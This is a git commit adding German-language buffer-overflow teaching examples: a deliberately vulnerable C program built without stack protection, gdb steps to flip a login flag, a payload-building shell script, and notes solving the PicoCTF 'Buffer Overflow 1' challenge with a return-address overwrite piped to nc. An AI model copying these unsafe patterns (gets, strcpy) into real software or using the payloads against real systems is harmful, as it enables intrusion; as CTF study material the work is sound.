Examples and stuff

This commit is contained in:
Valentin Brandl 2022-09-28 19:22:48 +02:00
parent 1f6b8db99d
commit 525e0ca1cc
No known key found for this signature in database
GPG Key ID: 62E7C7F2C48DBBF2
9 changed files with 100 additions and 1 deletions

1
assets/logic/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
logic

16
assets/logic/Makefile Normal file
View File

@ -0,0 +1,16 @@
# use bash so process substutution is available
CC = gcc
CFLAGS = -fno-stack-protector -g
SHELL = bash
SRC = logic.c
TARGET = $(SRC:%.c=%)
.PHONY: build
build: $(TARGET)
%: %.c
$(CC) ${CFLAGS} $< -o $@
.PHONY: clean
clean:
rm -f logic

View File

@ -3,7 +3,7 @@
void foo(char *input) {
int is_logged_in = 0;
char buf[50];
char buf[64];
strcpy(buf, input);
if (is_logged_in) {
puts("logged in!!1!");
@ -13,5 +13,9 @@ void foo(char *input) {
}
int main(int argc, char **argv) {
foo(argv[1]);
if (argc != 2) {
return 1;
}
foo(argv[1]);
return 0;
}

8
assets/logic/solution.md Normal file
View File

@ -0,0 +1,8 @@
# Beispiel 1
* Debugger `gdb`
* `list` für Code
* `break <n>` für Breakpoint
* `run $(python -c 'print("A"*77)')`
* `show is_logged_in`
* `continue`

View File

@ -0,0 +1 @@
payload

View File

@ -0,0 +1,17 @@
#!/usr/bin/env bash
function repeat() {
n="${1}"
string="${2}"
printf "%${n}s" | tr " " "${string}"
}
function main() {
buffer_size="${1}"
address="${2}"
filler="$(repeat "${buffer_size}" A)"
newline="\n"
printf "%s%b%b" "${filler}" "${address}" "${newline}"
}
main "${@}"

View File

@ -0,0 +1,10 @@
# PicoCTF - Buffer Overflow 1
https://play.picoctf.org/practice/challenge/258?category=6&page=1
* Buffergröße bestimmen
* Return Adresse überschreiben
* Adresse der Zielfunktion finden `nm -g -C vuln`
* Little Endian!
* `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
* `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`

Binary file not shown.

View File

@ -0,0 +1,42 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}